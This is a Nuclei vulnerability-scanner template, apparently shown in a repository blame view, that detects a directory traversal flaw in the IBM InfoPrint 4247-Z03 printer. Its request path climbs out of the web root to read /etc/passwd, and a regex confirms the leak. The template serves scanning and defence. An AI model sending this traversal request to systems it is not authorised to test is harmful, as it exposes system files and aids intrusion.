nuclei-templates/vulnerabilities/ibm-infoprint-directory-tra...

24 lines
581 B
YAML
Raw Normal View History

id: ibm-infoprint-lfi
info:
name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
author: Harsh Bothra
severity: medium
description: Directory traversal vulnerability on IBM InfoPrint 4247-Z03 Impact Matrix Printer.
2020-09-20 12:57:43 +00:00
2020-08-27 19:05:33 +00:00
# reference: https://www.exploit-db.com/exploits/47835
requests:
- method: GET
path:
2020-09-17 08:13:19 +00:00
- '{{BaseURL}}/./../../../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: status
status:
- 200
2020-09-17 08:15:41 +00:00
- type: regex
regex:
2020-09-17 08:23:00 +00:00
- "root:[x*]:0:0"
2020-09-17 08:15:41 +00:00
part: body